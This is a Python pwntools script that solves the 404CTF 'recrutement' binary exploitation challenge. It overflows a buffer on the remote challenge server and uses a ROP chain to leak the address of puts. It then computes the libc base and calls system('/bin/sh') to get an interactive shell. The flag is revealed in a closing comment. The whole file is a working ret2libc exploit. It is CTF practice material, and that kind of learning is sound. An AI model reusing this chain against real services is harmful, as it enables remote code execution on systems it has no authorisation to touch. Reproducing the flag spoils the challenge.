#!/bin/python3
from pwn import *

# https://heartburn.dev/picoctf-2021-binary-exploitation/#here-s-a-libc

vuln_elf = ELF("./recrutement")

r = remote('challenge.404ctf.fr','30690')
libc = ELF('./libc-2.27.so')
#r = vuln_elf.process()
#r = remote('127.0.0.1','4242')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

pop_rdi = 0x0000000000400763
ret_addr = 0x0000000000400506
# These are my libc addresses
# exit_addr = 0x7ffff7e00100
# bin_sh = 0x7ffff7f59882
# system_addr = 0x7ffff7e0a860

# These should be the provided libc values
# exit_addr = 0x7ffff7e04240
# bin_sh = 0x7ffff7f74e1a
# system_addr = 0x7ffff7e10550

puts_plt = vuln_elf.plt['puts']
main_plt = vuln_elf.symbols['main']
puts_got = vuln_elf.got['puts']

# Dummy values
dummy = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3"

# try to get the libc address (of puts)
rop1 = b""
rop1 += dummy
rop1 += p64(pop_rdi)
rop1 += p64(puts_got)
rop1 += p64(puts_plt)
rop1 += p64(main_plt)

print("***ROP1***")
print(r.recvline()) # bonjour...
print(r.recvline()) # veuillez...
r.sendline(b"scientifique")
print(r.recvline()) # votre profil...
r.sendline(rop1)
print(r.recvline()) # Merci...

# leaked addr
leak = u64(r.recvline().strip().ljust(8, b"\x00"))
libc.address = leak - libc.symbols['puts']
log.info(f"leaked puts @ {hex(leak)}")
log.info(f"libc @ {hex(libc.address)}")

# The actual payload
bin_sh = next(libc.search(b"/bin/sh")) #+ libc.address
system_addr = libc.symbols["system"] #+ libc.address
exit_addr = libc.symbols["exit"] #+ libc.address

log.info(f"/bin/sh @{hex(bin_sh)}")
log.info(f"system @{hex(system_addr)}")
log.info(f"exit @{hex(exit_addr)}")


#context.binary = './recrutement'

#overflow offset
exploit = dummy
# https://ropemporium.com/guide.html#Common%20pitfalls
exploit += p64(ret_addr)
exploit += p64(pop_rdi)
exploit += p64(bin_sh)
#exploit += b"id     ;"
exploit += p64(system_addr)
exploit += b"LEXLUTHO"
exploit += b"SUPERMAN"

print(r.clean())
r.sendline(b"scientifique")
print(r.recvline()) # votre profil...
r.sendline(exploit)
print(r.recvline()) # Merci...

# Running
r.interactive()

# 404CTF{C3_r3CrU73M3N7_N357_P45_53CUr153!}


